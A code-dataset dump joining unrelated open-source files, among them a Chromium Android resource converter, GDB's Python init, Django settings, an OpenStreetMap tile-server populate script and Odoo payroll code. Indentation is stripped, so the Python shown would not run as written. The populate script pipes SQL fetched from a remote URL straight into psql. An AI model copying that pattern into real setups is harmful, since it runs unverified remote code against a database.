is_modified = False
# Iterate all the elements' attributes to find attributes to convert.
for element in IterateXmlElements(dom):
for name, value in list(element.attributes.items()):
# Convert any API 17 Start/End attributes to Left/Right attributes.
# For example, from paddingStart="10dp" to paddingLeft="10dp"
# Note: gravity attributes are not necessary to convert because
# start/end values are backward-compatible. Explained at
# https://plus.sandbox.google.com/+RomanNurik/posts/huuJd8iVVXY?e=Showroom
if name in ATTRIBUTES_TO_MAP:
element.setAttribute(ATTRIBUTES_TO_MAP[name], value)
del element.attributes[name]
is_modified = True
elif assert_not_deprecated:
AssertNotDeprecatedAttribute(name, value, filename)
return is_modified
def GenerateV14StyleResourceDom(dom, filename, assert_not_deprecated=True):
"""Convert style resource to API 14 compatible style resource.
Args:
dom: Parsed minidom object to be modified.
filename: Filename that the DOM was parsed from.
assert_not_deprecated: Whether deprecated attributes (e.g. paddingLeft) will
cause an exception to be thrown.
Returns:
True if dom is modified, False otherwise.
"""
is_modified = False
for style_element in dom.getElementsByTagName('style'):
for item_element in style_element.getElementsByTagName('item'):
name = item_element.attributes['name'].value
value = item_element.childNodes[0].nodeValue
if name in ATTRIBUTES_TO_MAP:
item_element.attributes['name'].value = ATTRIBUTES_TO_MAP[name]
is_modified = True
elif assert_not_deprecated:
AssertNotDeprecatedAttribute(name, value, filename)
return is_modified
def GenerateV14LayoutResource(input_filename, output_v14_filename,
output_v17_filename):
"""Convert API 17 layout resource to API 14 compatible layout resource.
It's mostly a simple replacement, s/Start/Left s/End/Right,
on the attribute names.
If the generated resource is identical to the original resource,
don't do anything. If not, write the generated resource to
output_v14_filename, and copy the original resource to output_v17_filename.
"""
dom = minidom.parse(input_filename)
is_modified = GenerateV14LayoutResourceDom(dom, input_filename)
if is_modified:
# Write the generated resource.
WriteDomToFile(dom, output_v14_filename)
# Copy the original resource.
build_utils.MakeDirectory(os.path.dirname(output_v17_filename))
shutil.copy2(input_filename, output_v17_filename)
def GenerateV14StyleResource(input_filename, output_v14_filename):
"""Convert API 17 style resources to API 14 compatible style resource.
Write the generated style resource to output_v14_filename.
It's mostly a simple replacement, s/Start/Left s/End/Right,
on the attribute names.
"""
dom = minidom.parse(input_filename)
GenerateV14StyleResourceDom(dom, input_filename)
# Write the generated resource.
WriteDomToFile(dom, output_v14_filename)
def GenerateV14LayoutResourcesInDir(input_dir, output_v14_dir, output_v17_dir):
"""Convert layout resources to API 14 compatible resources in input_dir."""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
rel_filename = os.path.relpath(input_filename, input_dir)
output_v14_filename = os.path.join(output_v14_dir, rel_filename)
output_v17_filename = os.path.join(output_v17_dir, rel_filename)
GenerateV14LayoutResource(input_filename, output_v14_filename,
output_v17_filename)
def GenerateV14StyleResourcesInDir(input_dir, output_v14_dir):
"""Convert style resources to API 14 compatible resources in input_dir."""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
rel_filename = os.path.relpath(input_filename, input_dir)
output_v14_filename = os.path.join(output_v14_dir, rel_filename)
GenerateV14StyleResource(input_filename, output_v14_filename)
def VerifyV14ResourcesInDir(input_dir, resource_type):
"""Verify that the resources in input_dir is compatible with v14, i.e., they
don't use attributes that cause crashes on certain devices. Print an error if
they have."""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
warning_message = ('warning : ' + input_filename + ' has an RTL attribute, '
'i.e., attribute that has "start" or "end" in its name.'
' Pre-v17 resources should not include it because it '
'can cause crashes on certain devices. Please refer to '
'http://crbug.com/243952 for the details.')
dom = minidom.parse(input_filename)
if resource_type in ('layout', 'xml'):
if GenerateV14LayoutResourceDom(dom, input_filename, False):
print warning_message
elif resource_type == 'values':
if GenerateV14StyleResourceDom(dom, input_filename, False):
print warning_message
def AssertNoDeprecatedAttributesInDir(input_dir, resource_type):
"""Raises an exception if resources in input_dir have deprecated attributes,
e.g., paddingLeft, paddingRight"""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
dom = minidom.parse(input_filename)
if resource_type in ('layout', 'xml'):
GenerateV14LayoutResourceDom(dom, input_filename)
elif resource_type == 'values':
GenerateV14StyleResourceDom(dom, input_filename)
def ParseArgs():
"""Parses command line options.
Returns:
An options object as from optparse.OptionsParser.parse_args()
"""
parser = optparse.OptionParser()
parser.add_option('--res-dir',
help='directory containing resources '
'used to generate v14 compatible resources')
parser.add_option('--res-v14-compatibility-dir',
help='output directory into which '
'v14 compatible resources will be generated')
parser.add_option('--stamp', help='File to touch on success')
parser.add_option('--verify-only', action="store_true", help='Do not generate'
' v14 resources. Instead, just verify that the resources are already '
"compatible with v14, i.e. they don't use attributes that cause crashes "
'on certain devices.')
options, args = parser.parse_args()
if args:
parser.error('No positional arguments should be given.')
# Check that required options have been provided.
required_options = ('res_dir', 'res_v14_compatibility_dir')
build_utils.CheckOptions(options, parser, required=required_options)
return options
def GenerateV14Resources(res_dir, res_v14_dir, verify_only):
for name in os.listdir(res_dir):
if not os.path.isdir(os.path.join(res_dir, name)):
continue
dir_pieces = name.split('-')
resource_type = dir_pieces[0]
qualifiers = dir_pieces[1:]
api_level_qualifier_index = -1
api_level_qualifier = ''
for index, qualifier in enumerate(qualifiers):
if re.match('v[0-9]+$', qualifier):
api_level_qualifier_index = index
api_level_qualifier = qualifier
break
# Android pre-v17 API doesn't support RTL. Skip.
if 'ldrtl' in qualifiers:
continue
input_dir = os.path.abspath(os.path.join(res_dir, name))
if verify_only:
if not api_level_qualifier or int(api_level_qualifier[1:]) < 17:
VerifyV14ResourcesInDir(input_dir, resource_type)
else:
AssertNoDeprecatedAttributesInDir(input_dir, resource_type)
else:
# We also need to copy the original v17 resource to *-v17 directory
# because the generated v14 resource will hide the original resource.
output_v14_dir = os.path.join(res_v14_dir, name)
output_v17_dir = os.path.join(res_v14_dir, name + '-v17')
# We only convert layout resources under layout*/, xml*/,
# and style resources under values*/.
if resource_type in ('layout', 'xml'):
if not api_level_qualifier:
GenerateV14LayoutResourcesInDir(input_dir, output_v14_dir,
output_v17_dir)
elif resource_type == 'values':
if api_level_qualifier == 'v17':
output_qualifiers = qualifiers[:]
del output_qualifiers[api_level_qualifier_index]
output_v14_dir = os.path.join(res_v14_dir,
'-'.join([resource_type] +
output_qualifiers))
GenerateV14StyleResourcesInDir(input_dir, output_v14_dir)
elif not api_level_qualifier:
ErrorIfStyleResourceExistsInDir(input_dir)
def main():
options = ParseArgs()
res_v14_dir = options.res_v14_compatibility_dir
build_utils.DeleteDirectory(res_v14_dir)
build_utils.MakeDirectory(res_v14_dir)
GenerateV14Resources(options.res_dir, res_v14_dir, options.verify_only)
if options.stamp:
build_utils.Touch(options.stamp)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
UBERTC/binutils | gdb/python/lib/gdb/__init__.py | 26 | 4609 | # Copyright (C) 2010-2016 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import traceback
import os
import sys
import _gdb
if sys.version_info[0] > 2:
# Python 3 moved "reload"
from imp import reload
from _gdb import *
class _GdbFile (object):
# These two are needed in Python 3
encoding = "UTF-8"
errors = "strict"
def close(self):
# Do nothing.
return None
def isatty(self):
return False
def writelines(self, iterable):
for line in iterable:
self.write(line)
def flush(self):
flush()
class GdbOutputFile (_GdbFile):
def write(self, s):
write(s, stream=STDOUT)
sys.stdout = GdbOutputFile()
class GdbOutputErrorFile (_GdbFile):
def write(self, s):
write(s, stream=STDERR)
sys.stderr = GdbOutputErrorFile()
# Default prompt hook does nothing.
prompt_hook = None
# Ensure that sys.argv is set to something.
# We do not use PySys_SetArgvEx because it did not appear until 2.6.6.
sys.argv = ['']
# Initial pretty printers.
pretty_printers = []
# Initial type printers.
type_printers = []
# Initial xmethod matchers.
xmethods = []
# Initial frame filters.
frame_filters = {}
# Initial frame unwinders.
frame_unwinders = []
def execute_unwinders(pending_frame):
"""Internal function called from GDB to execute all unwinders.
Runs each currently enabled unwinder until it finds the one that
can unwind given frame.
Arguments:
pending_frame: gdb.PendingFrame instance.
Returns:
gdb.UnwindInfo instance or None.
"""
for objfile in _gdb.objfiles():
for unwinder in objfile.frame_unwinders:
if unwinder.enabled:
unwind_info = unwinder(pending_frame)
if unwind_info is not None:
return unwind_info
current_progspace = _gdb.current_progspace()
for unwinder in current_progspace.frame_unwinders:
if unwinder.enabled:
unwind_info = unwinder(pending_frame)
if unwind_info is not None:
return unwind_info
for unwinder in frame_unwinders:
if unwinder.enabled:
unwind_info = unwinder(pending_frame)
if unwind_info is not None:
return unwind_info
return None
# Convenience variable to GDB's python directory
PYTHONDIR = os.path.dirname(os.path.dirname(__file__))
# Auto-load all functions/commands.
# Packages to auto-load.
packages = [
'function',
'command',
'printer'
]
# pkgutil.iter_modules is not available prior to Python 2.6. Instead,
# manually iterate the list, collating the Python files in each module
# path. Construct the module name, and import.
def auto_load_packages():
for package in packages:
location = os.path.join(os.path.dirname(__file__), package)
if os.path.exists(location):
py_files = filter(lambda x: x.endswith('.py')
and x != '__init__.py',
os.listdir(location))
for py_file in py_files:
# Construct from foo.py, gdb.module.foo
modname = "%s.%s.%s" % ( __name__, package, py_file[:-3] )
try:
if modname in sys.modules:
# reload modules with duplicate names
reload(__import__(modname))
else:
__import__(modname)
except:
sys.stderr.write (traceback.format_exc() + "\n")
auto_load_packages()
def GdbSetPythonDirectory(dir):
"""Update sys.path, reload gdb and auto-load packages."""
global PYTHONDIR
try:
sys.path.remove(PYTHONDIR)
except ValueError:
pass
sys.path.insert(0, dir)
PYTHONDIR = dir
# note that reload overwrites the gdb module without deleting existing
# attributes
reload(__import__(__name__))
auto_load_packages()
| gpl-2.0 |
desmovalvo/virtualsib-part2 | tools/explo2/SS_HelloWorld_reactiveNode.py | 5 | 1712 | import Node
import time
import sys
# Create a node instance
# Programmer can give any name
# The infrastucture will assign unigue names ???
node = Node.ParticipantNode("HelloWorld reactive")
# Discover Smart Spaces around you
# Use the technologies used at the "vertical business domain"
# E.g. mDNS, UPnP, UDDI, Bluetooth SDP
# Connect to the selected smart space
# In this simple example we use localhost
#ss_handle = ("X", (Node.TCPConnector, ("127.0.0.1", 10011)))
ss_handle = node.discover()
print ss_handle
if not node.join(ss_handle):
sys.exit('Could not join to Smart Space')
print "--- Member of SS:", node.member_of
# end connenct
# Class structure to be called as subscription fires
class MsgHandler:
def __init__(self):
self.results = []
def handle(self, added, removed):
print "Newly created:", added
self.results.extend(added)
for i in self.results:
print "State of the space:", str(i)
print str(i[0][2])
print "HelloWorld"
node.CloseSubscribeTransaction(rs)
print "Closing reactive session"
node.leave(ss_handle)
sys.exit()
# Create a reactive-state (reactive) session with the
# smart space
rs = node.CreateSubscribeTransaction(ss_handle)
result = rs.subscribe_rdf([(('God', 'hasCreated', 'World'),'literal')], MsgHandler())
if result != []:
print "It seem The God has already done his job thus..."
print "HelloWorld"
node.CloseSubscribeTransaction(rs)
print "Unsubscribed"
node.leave(ss_handle)
inp = raw_input("Press any key if you are bored to wait\n")
node.CloseSubscribeTransaction(rs)
print "Unsubscribed"
node.leave(ss_handle)
sys.exit()
| lgpl-3.0 |
livingbio/weather-parser | src/weather/settings/local.py | 2 | 1978 | from .base import * # NOQA
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
DEBUG = False
# Django Debug Toolbar
INSTALLED_APPS += (
'debug_toolbar.apps.DebugToolbarConfig',)
# Show emails to console in DEBUG mode
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Log everything to the logs directory at the top
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')
# Reset logging
# (see http://www.caktusgroup.com/blog/2015/01/27/Django-Logging-Configuration-logging_config-default-settings-logger/)
LOGGING_CONFIG = None
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(pathname)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'django_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'django.log'),
'formatter': 'verbose'
},
'proj_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'project.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'django': {
'handlers': ['django_log_file'],
'propagate': True,
'level': 'DEBUG',
},
'project': {
'handlers': ['proj_log_file'],
'level': 'DEBUG',
},
}
}
logging.config.dictConfig(LOGGING)
| mit |
nkiraly/koadstation | tiledraweru14/provisioning/roles/maptile-import-tools/files/populate.py | 1 | 16836 | #!/usr/bin/env python
from os import chdir, remove
from sys import stderr, stdout
from optparse import OptionParser
from subprocess import Popen, PIPE
from xml.etree.ElementTree import parse, SubElement
from os.path import dirname, basename, splitext, join
from urlparse import urlparse, urljoin
from tempfile import mkstemp
from StringIO import StringIO
from zipfile import ZipFile
from urllib import urlopen
from time import strftime
import sys, traceback
import json
import cascadenik
import mapnik
epsg3857 = '+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null'
parser = OptionParser(usage="""%prog [options] [url...]""")
defaults = dict(style='https://raw.github.com/nkiraly/OSM-Solar/tiledrawer/tiledrawer.cfg',
bbox=(37.777, -122.352, 37.839, -122.226))
parser.set_defaults(**defaults)
parser.add_option('-s', '--style', dest='style',
help='URL of a style description, default %(style)s.' % defaults)
parser.add_option('-b', '--bbox', dest='bbox',
help='Bounding box in floating point geographic coordinates: south west north east.',
type='float', nargs=4)
def download_file(url):
""" Shell out to curl to download extract and return its local filename.
"""
s, h, path, p, q, f = urlparse(url)
base, ext = splitext(basename(path))
handle, filename = mkstemp(dir='progress', prefix=base+'-', suffix=ext)
curl = 'curl', '-s', '-o', filename, '-L', url
print >> stderr, '+', ' '.join(curl)
curl = Popen(curl, stdout=stdout, stderr=PIPE)
curl.wait()
if curl.returncode:
raise Exception('curl command returned %d' % curl.returncode)
return filename
def download_file_local(url):
return url
def combine_extracts(bbox, files):
""" Shell out to osmosis to combine extracts and pull out a bounding box.
"""
osmosis = ['osmosis']
for file in files:
osmosis += ['--rb', file, '--log-progress']
osmosis += ['--merge'] * len(files[1:])
osmosis += ['--bb'] + ['%s=%.6f' % kv for kv in zip('bottom left top right'.split(), bbox)]
osmosis += ['--wx', '-']
handle, filename = mkstemp(dir='progress', prefix='out-', suffix='.osm.bz2')
print >> stderr, '+', ' '.join(osmosis), '| bzip2 >', filename
osmosis = Popen(osmosis, stderr=open('progress/osmosis.log', 'w'), stdout=PIPE)
bzout = Popen(['bzip2'], stdin=osmosis.stdout, stdout=open(filename, 'w'))
osmosis.wait()
bzout.wait()
if osmosis.returncode:
raise Exception('osmosis command returned %d' % osmosis.returncode)
if bzout.returncode:
raise Exception('bzout command returned %d' % bzout.returncode)
return filename
def import_extract_osm2pgsql(filename):
""" Shell out to osm2pgsql to import extract file to Postgis.
"""
# Remove possible existing line table to get rid of its High Road views
psql = Popen('psql -U osm planet_osm'.split(), stdin=PIPE, stderr=PIPE, stdout=PIPE)
psql.stdin.write('DROP TABLE IF EXISTS planet_osm_line CASCADE;')
psql.stdin.close()
psql.wait()
if psql.returncode:
raise Exception('psql command returned %d' % psql.returncode)
# Import new OSM data
# TODO: is it safe to ask for 4GB of RAM here? Check /proc/meminfo MemFree.
osm2pgsql = 'osm2pgsql -smucK -C 4096 -U osm -d planet_osm -S osm2pgsql/default.style'.split()
osm2pgsql += [filename]
print >> stderr, '+', ' '.join(osm2pgsql)
logfile = open('progress/osm2pgsql.log', 'w')
osm2pgsql = Popen(osm2pgsql, stdout=logfile, stderr=logfile)
osm2pgsql.wait()
if osm2pgsql.returncode:
raise Exception('osm2pgsql command returned %d' % osm2pgsql.returncode)
# Apply new High Road views
highroad_sql = urlopen('https://raw.github.com/nkiraly/HighRoad/master/high_road_views-setup.pgsql').read()
psql = Popen('psql -U osm planet_osm'.split(), stdin=PIPE, stderr=PIPE, stdout=PIPE)
psql.stdin.write(highroad_sql)
psql.stdin.close()
psql.wait()
if psql.returncode:
raise Exception('psql command returned %d' % psql.returncode)
def import_extract_imposm(filename):
""" Shell out to imposm to import extract file to Postgis.
"""
imposm = 'imposm --read --write --table-prefix=imposm_'.split()
imposm += '--connect postgis://osm:@127.0.0.1/planet_osm'.split()
imposm += ['--cache-dir=/usr/local/tiledrawer/progress', filename]
print >> stderr, '+', ' '.join(imposm)
logfile = open('progress/imposm.log', 'w')
imposm = Popen(imposm, stdout=logfile, stderr=logfile)
imposm.wait()
if imposm.returncode:
raise Exception('imposm command returned %d' % imposm.returncode)
def download_coastline():
""" Download and unpack an unprojected "good" coastline from metro.teczno.com.
"""
curl = 'curl -sL http://osm-metro-extracts.s3.amazonaws.com/coastline-good-latlon.tar.bz2'.split()
print >> stderr, '+', ' '.join(curl), '| bzcat | tar -C progress -xf -'
curl = Popen(curl, stdout=PIPE, stderr=PIPE)
bzcat = Popen('bzcat'.split(), stdin=curl.stdout, stdout=PIPE, stderr=PIPE)
tar = Popen('tar -C progress -xf -'.split(), stdin=bzcat.stdout, stderr=PIPE)
curl.wait()
bzcat.wait()
tar.wait()
if curl.returncode:
raise Exception('curl command returned %d' % curl.returncode)
if bzcat.returncode:
raise Exception('bzcat command returned %d' % bzcat.returncode)
if tar.returncode:
raise Exception('tar command returned %d' % tar.returncode)
return 'progress/coastline-good.shp'
def import_coastline(filename, bbox=None):
""" Shell out to shp2pgsql to import a coastline file to Postgis.
The coastline file is understood to be unprojected (EPSG:4326).
"""
handle, extract_filename = mkstemp(dir='progress', prefix='coastline-', suffix='.shp')
remove(extract_filename)
ogr2ogr = 'ogr2ogr -t_srs EPSG:3857'.split()
if bbox is not None:
ogr2ogr += ['-spat']
ogr2ogr += map(str, [bbox[1], bbox[0], bbox[3], bbox[2]])
ogr2ogr += [extract_filename, filename]
print >> stderr, '+', ' '.join(ogr2ogr)
ogr2ogr = Popen(ogr2ogr)
ogr2ogr.wait()
if ogr2ogr.returncode:
raise Exception('ogr2ogr command returned %d' % ogr2ogr.returncode)
shp2pgsql = 'shp2pgsql', '-dID', '-s', '3857', extract_filename, 'coastline'
psql = 'psql -U osm planet_osm'.split()
print >> stderr, '+', ' '.join(shp2pgsql), '|', ' '.join(psql)
shp2pgsql = Popen(shp2pgsql, stdout=PIPE, stderr=PIPE)
psql = Popen(psql, stdin=shp2pgsql.stdout, stdout=PIPE, stderr=PIPE)
shp2pgsql.wait()
psql.wait()
if shp2pgsql.returncode:
raise Exception('shp2pgsql command returned %d' % shp2pgsql.returncode)
if psql.returncode:
raise Exception('psql command returned %d' % psql.returncode)
def import_style(url):
"""
"""
if url.endswith('.zip'):
import_style_tilemill(url)
update_status('Building Mapnik 2.0 (populate.py)')
build_mapnik2()
elif url.endswith('.cfg'):
import_style_tdcfg(url)
elif url.endswith('.mml'):
import_style_mml(url)
def build_mapnik2():
"""
"""
print >> stderr, '+ ./mapnik2.sh'
mapnik2 = Popen('./mapnik2.sh')
mapnik2.wait()
def get_shapefile_tablename(filepath):
"""
"""
filename = basename(filepath)
if filename == 'tile-drawer.osm2psgsql-polygon.shp':
return 'planet_osm_polygon'
elif filename == 'tile-drawer.osm2psgsql-point.shp':
return 'planet_osm_point'
elif filename == 'tile-drawer.osm2psgsql-line.shp':
return 'planet_osm_line'
elif filename == 'tile-drawer.imposm-admin.shp':
return 'imposm_admin'
elif filename == 'tile-drawer.imposm-aeroways.shp':
return 'imposm_aeroways'
elif filename == 'tile-drawer.imposm-amenities.shp':
return 'imposm_amenities'
elif filename == 'tile-drawer.imposm-buildings.shp':
return 'imposm_buildings'
elif filename == 'tile-drawer.imposm-landusages-gen0.shp':
return 'imposm_landusages_gen0'
elif filename == 'tile-drawer.imposm-landusages-gen1.shp':
return 'imposm_landusages_gen1'
elif filename == 'tile-drawer.imposm-landusages.shp':
return 'imposm_landusages'
elif filename == 'tile-drawer.imposm-mainroads-gen0.shp':
return 'imposm_mainroads_gen0'
elif filename == 'tile-drawer.imposm-mainroads-gen1.shp':
return 'imposm_mainroads_gen1'
elif filename == 'tile-drawer.imposm-mainroads.shp':
return 'imposm_mainroads'
elif filename == 'tile-drawer.imposm-minorroads.shp':
return 'imposm_minorroads'
elif filename == 'tile-drawer.imposm-motorways-gen0.shp':
return 'imposm_motorways_gen0'
elif filename == 'tile-drawer.imposm-motorways-gen1.shp':
return 'imposm_motorways_gen1'
elif filename == 'tile-drawer.imposm-motorways.shp':
return 'imposm_motorways'
elif filename == 'tile-drawer.imposm-places.shp':
return 'imposm_places'
elif filename == 'tile-drawer.imposm-railways-gen0.shp':
return 'imposm_railways_gen0'
elif filename == 'tile-drawer.imposm-railways-gen1.shp':
return 'imposm_railways_gen1'
elif filename == 'tile-drawer.imposm-railways.shp':
return 'imposm_railways'
elif filename == 'tile-drawer.imposm-roads-gen0.shp':
return 'imposm_roads_gen0'
elif filename == 'tile-drawer.imposm-roads-gen1.shp':
return 'imposm_roads_gen1'
elif filename == 'tile-drawer.imposm-roads.shp':
return 'imposm_roads'
elif filename == 'tile-drawer.imposm-transport-areas.shp':
return 'imposm_transport_areas'
elif filename == 'tile-drawer.imposm-transport-points.shp':
return 'imposm_transport_points'
elif filename == 'tile-drawer.imposm-waterareas-gen0.shp':
return 'imposm_waterareas_gen0'
elif filename == 'tile-drawer.imposm-waterareas-gen1.shp':
return 'imposm_waterareas_gen1'
elif filename == 'tile-drawer.imposm-waterareas.shp':
return 'imposm_waterareas'
elif filename == 'tile-drawer.imposm-waterways.shp':
return 'imposm_waterways'
elif filename == 'tile-drawer.coastline.shp':
return 'coastline'
else:
# wat
return ''
def import_style_tilemill(url):
""" Load a zipped-up stylesheet created from Tilemill.
"""
archive = ZipFile(StringIO(urlopen(url).read()))
xmlname = [name for name in archive.namelist() if name.endswith('.xml')][0]
doc = parse(StringIO(archive.read(xmlname)))
# Map shapefiles to PostGIS datasources.
def add_parameter(datasource, parameter, value):
SubElement(datasource, 'Parameter', dict(name=parameter)).text = value
for layer in doc.findall('Layer'):
for ds in layer.findall('Datasource'):
params = dict( [(p.attrib['name'], p.text)
for p in ds.findall('Parameter')] )
if params.get('type', None) == 'shape' and 'file' in params:
ds.clear()
add_parameter(ds, 'type', 'postgis')
add_parameter(ds, 'host', 'localhost')
add_parameter(ds, 'user', 'osm')
add_parameter(ds, 'dbname', 'planet_osm')
add_parameter(ds, 'table', get_shapefile_tablename(params['file']))
add_parameter(ds, 'extent', '-20037508,-20037508,20037508,20037508')
add_parameter(ds, 'estimate_extent', 'false')
out = open('gunicorn/mapnik2.xml', 'w')
out.write('<?xml version="1.0" encoding="utf-8"?>\n')
doc.write(out)
# Build a new TileStache configuration file.
config = json.load(open('gunicorn/tilestache.cfg'))
config['layers'] = {'tiles': {'provider': {}}}
layer = config['layers']['tiles']
layer['provider']['name'] = 'mapnik'
layer['provider']['mapfile'] = 'mapnik2.xml'
layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
layer['bounds'].update(dict(low=0, high=18))
layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
# Done.
json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def import_style_tdcfg(url):
""" Load a Cascadenik style and its constituent pieces from a URL.
"""
style = json.loads(urlopen(url).read())
mapfile = urljoin(options.style, style['mapfile'])
# Create a local style.xml file by way of a dummy mapnik.Map instance.
mmap = mapnik.Map(1, 1)
mmap.srs = epsg3857
cascadenik.load_map(mmap, mapfile, 'gunicorn', verbose=False)
mapnik.save_map(mmap, 'gunicorn/style.xml')
# Build a new TileStache configuration file.
config = json.load(open('gunicorn/tilestache.cfg'))
config['layers'] = {'tiles': {'provider': {}}}
layer = config['layers']['tiles']
layer['provider']['name'] = 'mapnik'
layer['provider']['mapfile'] = 'style.xml'
layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
layer['bounds'].update(dict(low=0, high=18))
layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
# Apply various layer options.
for (parameter, value) in style['layer'].items():
if parameter == 'png options' and 'palette' in value:
palette_url = urljoin(url, value['palette'])
palette_data = urlopen(palette_url).read()
palette_file = 'gunicorn/palette.act'
print >> stderr, ' ', palette_file, '<--', palette_url
open(palette_file, 'w').write(palette_data)
value['palette'] = 'palette.act'
layer[parameter] = value
# Done.
json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def import_style_mml(url):
"""
"""
# Create a local style.xml file by way of a dummy mapnik.Map instance.
mmap = mapnik.Map(1, 1)
mmap.srs = epsg3857
cascadenik.load_map(mmap, url, 'gunicorn', verbose=False)
mapnik.save_map(mmap, 'gunicorn/style.xml')
# Build a new TileStache configuration file.
config = json.load(open('gunicorn/tilestache.cfg'))
config['layers'] = {'tiles': {'provider': {}}}
layer = config['layers']['tiles']
layer['provider']['name'] = 'mapnik'
layer['provider']['mapfile'] = 'style.xml'
layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
layer['bounds'].update(dict(low=0, high=18))
layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
# Done.
json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def update_status(message):
"""
"""
status_file = open('/usr/local/tiledrawer/progress/status.txt', 'a')
status_ts = strftime('%a %b %d %H:%M:%S %Z %Y')
print "%s %s" % ( status_ts, message )
print >> status_file, status_ts, message
if __name__ == '__main__':
options, urls = parser.parse_args()
if dirname(__file__):
print >> stderr, '+ chdir', dirname(__file__)
chdir(dirname(__file__))
try:
update_status('Preparing database (populate.py)')
import_extract_osm2pgsql('postgres/init-data/null.osm')
import_coastline('postgres/init-data/null.shp')
update_status('Importing map style (populate.py)')
import_style(options.style)
update_status('Importing OpenStreetMap data (populate.py)')
osm_files = map(download_file, urls)
osm_filename = combine_extracts(options.bbox, osm_files)
import_extract_osm2pgsql(osm_filename)
import_extract_imposm(osm_filename)
update_status('Importing coastline data (populate.py)')
coast_filename = download_coastline()
import_coastline(coast_filename, options.bbox)
except Exception as ex:
update_status("populate.py exception: %s" % ex)
traceback.print_exc(file=sys.stdout)
exit(1)
else:
update_status('Finished (populate.py)')
| bsd-2-clause |
suhe/odoo | addons/hr_payroll_account/hr_payroll_account.py | 17 | 10205 | #-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp import api
from openerp.osv import fields, osv
from openerp.tools import float_compare, float_is_zero
from openerp.tools.translate import _
from openerp.exceptions import UserError
class hr_payslip_line(osv.osv):
'''
Payslip Line
'''
_inherit = 'hr.payslip.line'
def _get_partner_id(self, cr, uid, payslip_line, credit_account, context=None):
"""
Get partner_id of slip line to use in account_move_line
"""
# use partner of salary rule or fallback on employee's address
partner_id = payslip_line.salary_rule_id.register_id.partner_id.id or \
payslip_line.slip_id.employee_id.address_home_id.id
if credit_account:
if payslip_line.salary_rule_id.register_id.partner_id or \
payslip_line.salary_rule_id.account_credit.internal_type in ('receivable', 'payable'):
return partner_id
else:
if payslip_line.salary_rule_id.register_id.partner_id or \
payslip_line.salary_rule_id.account_debit.internal_type in ('receivable', 'payable'):
return partner_id
return False
class hr_payslip(osv.osv):
'''
Pay Slip
'''
_inherit = 'hr.payslip'
_description = 'Pay Slip'
_columns = {
'date': fields.date('Date Account', states={'draft': [('readonly', False)]}, readonly=True, help="Keep empty to use the period of the validation(Payslip) date."),
'journal_id': fields.many2one('account.journal', 'Salary Journal',states={'draft': [('readonly', False)]}, readonly=True, required=True),
'move_id': fields.many2one('account.move', 'Accounting Entry', readonly=True, copy=False),
}
def _get_default_journal(self, cr, uid, context=None):
journal_obj = self.pool.get('account.journal')
res = journal_obj.search(cr, uid, [('type', '=', 'general')])
if res:
return res[0]
return False
_defaults = {
'journal_id': _get_default_journal,
}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
if 'journal_id' in context:
vals.update({'journal_id': context.get('journal_id')})
return super(hr_payslip, self).create(cr, uid, vals, context=context)
def onchange_contract_id(self, cr, uid, ids, date_from, date_to, employee_id=False, contract_id=False, context=None):
contract_obj = self.pool.get('hr.contract')
res = super(hr_payslip, self).onchange_contract_id(cr, uid, ids, date_from=date_from, date_to=date_to, employee_id=employee_id, contract_id=contract_id, context=context)
journal_id = contract_id and contract_obj.browse(cr, uid, contract_id, context=context).journal_id.id or (not contract_id and self._get_default_journal(cr, uid, context=None))
res['value'].update({'journal_id': journal_id})
return res
@api.onchange('contract_id')
def onchange_contract(self):
super(hr_payslip, self).onchange_contract()
self.journal_id = self.contract_id and self.contract_id.journal_id.id or (not self.contract_id and self._get_default_journal())
return
def cancel_sheet(self, cr, uid, ids, context=None):
move_pool = self.pool.get('account.move')
move_ids = []
move_to_cancel = []
for slip in self.browse(cr, uid, ids, context=context):
if slip.move_id:
move_ids.append(slip.move_id.id)
if slip.move_id.state == 'posted':
move_to_cancel.append(slip.move_id.id)
